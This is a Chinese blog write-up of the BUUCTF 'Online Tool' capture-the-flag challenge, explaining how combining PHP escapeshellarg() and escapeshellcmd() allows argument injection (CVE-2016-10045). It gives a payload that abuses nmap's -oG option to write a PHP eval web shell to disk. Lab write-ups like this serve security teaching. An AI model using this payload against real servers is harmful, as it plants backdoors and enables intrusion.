WP-buuctf-online tool

最新推荐文章于 2024-11-03 18:47:47 发布
最新推荐文章于 2024-11-03 18:47:47 发布
阅读量2.2k 收藏
点赞数
分类专栏: buuctf 文章标签: 安全 web安全 网络安全 web php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/bin789456/article/details/121228190
版权

wp

在这里插入图片描述

这里是escapeshellarg()+escapeshellcmd()使用时出现的漏洞。
首先看下这两个函数是干啥的
在这里插入图片描述
在这里插入图片描述
这两个函数经常一起使用,先转义命令参数,再转义命令,看起来是非常正常的思路。
但是,一旦它们两个一起使用,就会出现漏洞
学习链接:https://paper.seebug.org/164/
漏洞编号:CVE-2016-10045

传入的参数是:172.17.0.2' -v -d a=1
经过escapeshellarg处理后变成了'172.17.0.2'\'' -v -d a=1',即先对单引号转义,再用单引号将左右两部分括起来从而起到连接的作用。
经过escapeshellcmd处理后变成'172.17.0.2'\\'' -v -d a=1\',这是因为escapeshellcmd对\以及最后那个不配对儿的引号进行了转义
最后执行的命令是curl '172.17.0.2'\\'' -v -d a=1\',由于中间的\被解释为\而不再是转义字符,所以后面的’没有被转义,与再后面的’配对儿成了一个空白连接符。所以可以简化为curl 172.17.0.2\ -v -d a=1',即向172.17.0.2\发起请求,POST 数据为a=1’。

所以使用单引号就可以造成多参数注入

nmap

那么也就是要利用nmap中的参数来下手,查询得到这个:
在这里插入图片描述

构造

所以这里构造payload:

?host=1' <?php eval($_POST["a"]); ?> -oG 1.php '

先来解释一下,首先使用1’来闭合,形成多参数注入,然后使用-oG参数,写入内容,并以1.php的文件格式及名称保存。
由于最后会多出一个',这样就能够与最后一个'闭合,就能够保存为1.php而不是1.php'
在这里插入图片描述
访问一下输出文件:
在这里插入图片描述
注入木马成功,连接即可

在这里插入图片描述
得到flag
在这里插入图片描述

sayo.
关注
专栏目录
[BUUCTF 2018]Online Tool -wp
freerats的博客
07-03 384
打开网页可以看到代码,进行代码审计 $sandbox = md5("glzjin". $_SERVER['REMOTE_ADDR']); echo 'you are in sandbox '.$sandbox; @mkdir($sandbox); chdir($sandbox); 获取你的ip,然后进行加密,把MD5值输出,然后以这个值创建一个目录 尝试一下127.0.0.1 ,发现调用nmap对输入的ip进行扫描 $host = $_GET['host']; $ho.
[BUUCTF 2018]Online Tool(超详细解析payload)
xlcvv的博客
04-15 4037
先吐槽一下,搜到了漏洞也不会利用,会利用了看到这题也不知道getflag,????,砸挖鲁多,食我压路机啊!! 题目给了源码 <?php if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR']; } if(!isset($_GET[...
buuctf Online tool
weixin_51313108的博客
08-27 236
考点 escapeshellarg()和escapeshellcmd()过滤函数的绕过 Linuxnamp命令的使用 代码分析 <?php if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR']; } 无关紧要的一组代码 if(!isset($_GET['host'])) { highlight_file(__FILE__);
[BUUCTF 2018]Online Tool
m0_62092622的博客
04-15 434
打开是源码 <?php if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR']; } if(!isset($_GET['host'])) { highlight_file(__FILE__); } else { $host = $_GET['host']; //escapeshellarg — 把字符串转码为
BUUCTF-Online Tool
m0_47571887的博客
11-10 721
这道题真的挺不常见的,考的点也有点不常见 打开题目 一段代码这里就有两个不常见的函数escapeshellarg()和escapeshellcmd(),PHP escapeshellarg()+escapeshellcmd() 之殇 给大家放个链接来理解 大概来说就是这两个函数对我们传入的数值进行单引号转义,会加上/符号,那这时候就只能往后看看能不能利用namp做点文章。 在nmap中有一个参数-oG,就是将命令和结果都写入到文件,到这里我们就可以想到上传一句话,然后写入到php文件里
[BUUCTF 2018]Online Tool1
whale_waves的博客
12-06 1084
首先是进行判断http信息头里是否在HTTP_X_FORWARDED_FOR并且是否有参数 $_SERVER[“HTTP_X_FORWARDED_FOR”] 的值才是客户端真正的IP(如果是多层代理,该值可能是由客户端真正IP和多个代理服务器的IP组成,由逗号“,”分隔)将给字符串增加一个单引号并且能引用或者转义任何已经存在的单引号,这样以确保能够直接将一个字符串传入 shell 函数,并且还是确保安全的。这里用的两个函数其实就是确保命令到system或者exec里执行时是安全的。
[BUUCTF2018 Online Tool]
uuzfumo的博客
11-01 317
新手RCE题目
2021-08-14BUUCTF 2018]Online Tool(escapeshellarg+escapeshellcmd函数连用导致rce、nmap -oG写shell转)
qq_45290991的博客
08-14 391
本文转自大佬K0f1i先吐槽一下,搜到了漏洞也不会利用,会利用了看到这题也不知道getflag,????,砸挖鲁多,食我压路机啊!! 题目给了源码 <?php if (isset(KaTeX parse error: Double subscript at position 110: …string">'HTTP_X_̲FOR...
BUUCTF__[BUUCTF 2018]Online Tool_题解
风过江南乱的博客
07-18 842
前言 今天看到了一位学长写的关于这题的wp。 有一句:“我到底到什么时候,才能学会,看知识点写题,而不是看题解写题。” 太真实了。。。有点迷。 研究 看题目源码就目标很明确,利用$host 变量system()命令执行 <?php if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR']; } if(!isset($_GET['h
buuctf-misc部分wp(更新一下)
a3uRa的一个窝
02-17 8389
前言(撮合看看吧 因为直接复制的本地 所以图片就没法显示了 有什么不懂的地方可以给我留言哦~ 然后推荐一个公众号:lin先森 求关注) b站 [BJDCTF2020]纳尼 添加gif头 [BJDCTF2020]鸡你太美 添加gif头 [BJDCTF2020]just_a_rar 爆破 ss的file format [BJDCTF2020]认真你就输了 xls文件 binwalk [BJDCT...
BUUCTF-WEB
ccfly1012的博客
11-02 3910
目录 [HCTF 2018]WarmUp [极客大挑战 2019]EasySQL 总结万能密码 [极客大挑战 2019]Havefun [强网杯 2019]随便注 [ACTF2020 新生赛]Include [SUCTF 2019]EasySQL [极客大挑战 2019]Secret File [ACTF2020 新生赛]Exec [极客大挑战 2019]LoveSQL [GXYCTF2019]Ping Ping Ping [HCTF 2018]WarmUp 打开网页,查看一下源代
前端如何安全存储密钥,防止信息泄露
AM1n98的博客
10-30 1280
把公钥写在前端代码文件里被公司检测到了要整改,整理几种常见的前端密钥存储方案。
轻型民用无人驾驶航空器安全操控理论培训知识总结-多旋翼部分
Lizzy_Fly的博客
10-30 940
15.航空器的视觉避障只有在光照等环境条件满足视觉系统工作要求时才能生效,光照条件特别暗或者特别亮的情况下,请谨慎飞行,即使视觉系统正常工作时,也可能无法精准识别高压线,而且高压线还会影响图传和遥控信号,因此不建议在高压线间飞行,如因电力巡检等工作原因必须在此环境下飞行,建议经专门培训后再进行操作;当航空器记录了返航点并且在定位服务良好的情况下,航空器电池电量不足、遥控器与航空器之间失去通讯信号以及图传信号丢失时,将会触发自动返航,操控员也可主动开启自动返航,航空器将自动返回返航点并降落。
Linux系统安全配置
qq_24442273的博客
10-28 990
【代码】Linux系统安全配置。
网站被浏览器提示不安全怎么办?——附解决方案
2403_87921797的博客
10-30 595
首先,确保你的网站使用了有效的SSL证书。使用安全扫描工具来检测潜在的安全问题。记住,网站安全不仅关乎用户体验,也直接影响到网站的搜索排名和信誉。:在解决问题期间,通过社交媒体、电子邮件等方式通知用户你的网站正在进行安全维护,以减少用户的不信任感。:如果你已经解决了安全问题,可以向浏览器提供商提交重新审查的请求,以便他们更新你的网站安全状态。:即使问题得到解决,也需要持续监控网站的安全状态,防止未来再次出现安全问题。:确保你的网站托管服务提供商具有良好的安全记录,能够提供必要的安全支持。
重磅新品丨Fortinet 发布 Lacework FortiCNAPP,强化云原生应用安全
Sophya89的博客
10-30 1004
致力于网络与安全融合的全球网络安全供应商 Fortinet®(纳斯达克代码:FTNT)近日宣布,推出了一款全新人工智能(AI)驱动的统一防护平台——Lacework FortiCNAPP,该平台依托单一供应商优势,全面覆盖从代码安全到云安全的应用程序全生命周期。
如何在Linux系统中使用SSH进行安全连接
qq_36287830的博客
10-30 441
SSH是一个网络协议,用于计算机之间的安全登录以及命令执行,此外还允许进行安全的数据传输。通过本文,你已经学习了如何在Linux系统中使用SSH进行安全连接。我们介绍了SSH的基本概念、安装方法、启动SSH服务、验证安装、SSH配置、SSH客户端、SSH密钥认证、使用SSH隧道、SSH端口转发、使用SSH代理、SSH环境变量、SSH日志、SSH守护进程选项、使用SSH密钥管理工具、使用SSH证书、使用SSH网关、SSH的高级特性等内容。
高校实验室安全巡检系统设计与实现(源码+定制+开发)高校实验室巡检系统、实验室安全管理平台、实验室安全监控系统、智能实验室巡查系统、高校实验室风险管理
最新发布
程序员阿龙的博客
11-03 768
博主介绍: ✌我是阿龙,一名专注于Java技术领域的程序员,全网拥有10W+粉丝。作为CSDN特邀作者、博客专家、新星计划导师,我在计算机毕业设计开发方面积累了丰富的经验。同时,我也是掘金、华为云、阿里云、InfoQ等平台的优质作者。通过长期分享和实战指导,我致力于帮助更多学生完成毕业项目和技术提升。 技术范围: 我熟悉的技术领域涵盖SpringBoot、Vue、SSM、HLMT、Jsp、PHP、Nodejs、Python、爬虫、数据可视化、小程序、安卓app、大数据、物联网、机器学习等方
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值